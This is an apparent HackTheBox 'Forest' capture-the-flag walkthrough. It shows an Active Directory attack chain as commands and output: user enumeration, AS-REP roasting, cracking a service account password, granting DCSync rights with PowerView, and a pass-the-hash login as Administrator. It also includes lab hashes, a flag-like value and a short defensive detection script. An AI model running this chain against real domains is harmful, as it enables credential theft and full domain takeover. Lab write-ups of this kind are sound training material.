HackTheBox-Forest


nmap -p- -sS -Pn -sV -sC 10.129.95.210


53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-28 03:18:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49680/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49681/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2022-03-27T20:53:39-07:00
| smb2-time:
| date: 2022-03-28T03:53:40
|_ start_date: 2022-03-28T03:06:33
|_clock-skew: mean: 2h26m50s, deviation: 4h02m32s, median: 6m48s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required

Getting usernames with rpcclient

rpcclient -U "" -N 10.129.95.210

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

Verification

kerbrute userenum --dc 10.129.95.210 -d htb.local username

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 03/28/22 - Ronnie Flathers @ropnop

2022/03/28 06:42:11 > Using KDC(s):
2022/03/28 06:42:11 > 10.129.95.210:88

2022/03/28 06:42:11 > [+] VALID USERNAME: [email protected]
2022/03/28 06:42:11 > [+] VALID USERNAME: [email protected]
2022/03/28 06:42:11 > [+] VALID USERNAME: [email protected]
2022/03/28 06:42:11 > [+] VALID USERNAME: [email protected]
2022/03/28 06:42:11 > [+] VALID USERNAME: [email protected]
2022/03/28 06:42:11 > [+] VALID USERNAME: [email protected].local
2022/03/28 06:42:11 > [+] VALID USERNAME: [email protected]

GetNPUsers

impacket-GetNPUsers htb.local/ -dc-ip 10.129.95.210 -request -no-pass -usersfile a.txt
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:5a15690edeca3ca535a84b1689dcd453$671459d5fd66b293f9cca612833bc09e6d2133e8c4a3ff5c0ae43aae9021b67026c2add8949e9745febb2beedf935f2dedb4a0c7c0c550ad8387dc9f1a45ff9554189a58497cd70e35fd3eba797df7cc7c3529411ac7c02046c935bcb8efecfbf3114e98652653d9e24a874123dbdc608eb14ffff5d55523ed4ec7987bdb4c2a511e548aa03bb1f9c0c1781f0639321931f76130130af439e9b493835ec669aef60e3c12c1d8cd79dd8c10c7f3f33fb814d744c55dd8b4f1800f99bfd1db767e22471c43835e8aacfc6b3b4425a5b42a02ddd16ca370de92c382b40de263b1606f594fadceb0
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

Cracking

hashcat -m 18200 hash.txt rockyou.txt
[email protected]:5a15690edeca3ca535a84b1689dcd453$671459d5fd66b293f9cca612833bc09e6d2133e8c4a3ff5c0ae43aae9021b67026c2add8949e9745febb2beedf935f2dedb4a0c7c0c550ad8387dc9f1a45ff9554189a58497cd70e35fd3eba797df7cc7c3529411ac7c02046c935bcb8efecfbf3114e98652653d9e24a874123dbdc608eb14ffff5d55523ed4ec7987bdb4c2a511e548aa03bb1f9c0c1781f0639321931f76130130af439e9b493835ec669aef60e3c12c1d8cd79dd8c10c7f3f33fb814d744c55dd8b4f1800f99bfd1db767e22471c43835e8aacfc6b3b4425a5b42a02ddd16ca370de92c382b40de263b1606f594fadceb0:s3rvice
./aclpwn-env/bin/bloodhound-python  -c ALL -u svc-alfresco -p s3rvice -d HTB.local -dc forest.HTB.local -ns 10.10.10.161 --dns-timeout 20

The collection can also be done with bloodhound.exe.

Shortest path to the domain controller: svc-alfresco is a service account that can add users to the Exchange Windows Permissions group, and members of that group can write the DCSync ACL, which makes it possible to dump ntds.dit.


Using PowerView.ps1

Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members 'svc-alfresco' -Credential $Cred
Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync


$user="htb\svc-alfresco";$SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force;$Cred = New-Object System.Management.Automation.PSCredential($user, $SecPassword);Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members 'svc-alfresco' -Credential $Cred;net user svc-alfresco;Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync ;net user svc-alfresco;
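As an added defender-side example (not part of this writeup): a small Python detector for the two techniques used on this box, AS-REP roasting (event 4768 issued without pre-authentication and with RC4) and DCSync (event 4662 exercising directory-replication rights from an account that is not a domain controller), run over constructed sample events. The field names follow the Windows Security event XML, but the events themselves are made up for the example.

```python
import re

# Well-known control-access-right GUIDs; a principal holding these on the
# domain object can pull password hashes through the replication API (DCSync).
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# Constructed sample events in a flattened key=value form (not real logs from
# the box): two TGT requests (4768) and two operations on the domain object (4662).
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=sebastien PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.14.5",
    "EventID=4768 TargetUserName=svc-alfresco PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.5",
    "EventID=4662 SubjectUserName=FOREST$ ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=svc-alfresco ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
]

def parse_event(line):
    """Split 'key=value key=value ...' into a dict. Values may contain spaces
    (the Properties list), so a value runs until the next ' key=' token."""
    return dict(re.findall(r"(\w+)=(.*?)(?=\s+\w+=|$)", line))

def is_asrep_roast(ev):
    # A TGT issued with no pre-authentication (PreAuthType 0) and RC4 (0x17)
    # is what gets requested for an account flagged DONT_REQUIRE_PREAUTH.
    return (ev.get("EventID") == "4768"
            and ev.get("PreAuthType") == "0"
            and ev.get("TicketEncryptionType", "").lower() == "0x17")

def is_dcsync(ev):
    # Replication rights exercised by anything other than a domain
    # controller's machine account (name ends in '$') is the DCSync signature.
    if ev.get("EventID") != "4662":
        return False
    props = ev.get("Properties", "").lower()
    subject = ev.get("SubjectUserName", "")
    return (any(g in props for g in (DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL))
            and not subject.endswith("$"))

def detect(lines):
    """Return (rule, account) pairs for every event that matches a rule."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if is_asrep_roast(ev):
            findings.append(("asrep-roast", ev["TargetUserName"]))
        elif is_dcsync(ev):
            findings.append(("dcsync", ev["SubjectUserName"]))
    return findings
```

Running `detect(SAMPLE_EVENTS)` flags the no-preauth TGT for svc-alfresco and the replication call made under svc-alfresco, while the legitimate request and the DC's own replication stay quiet.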

Log in directly and it's done.

evil-winrm -i 10.10.10.161 -u Administrator -H '32693b11e6aa90eb43d32c72a07ceea6'
a2cd87c0f5dd7e6d0317e5bc6b793142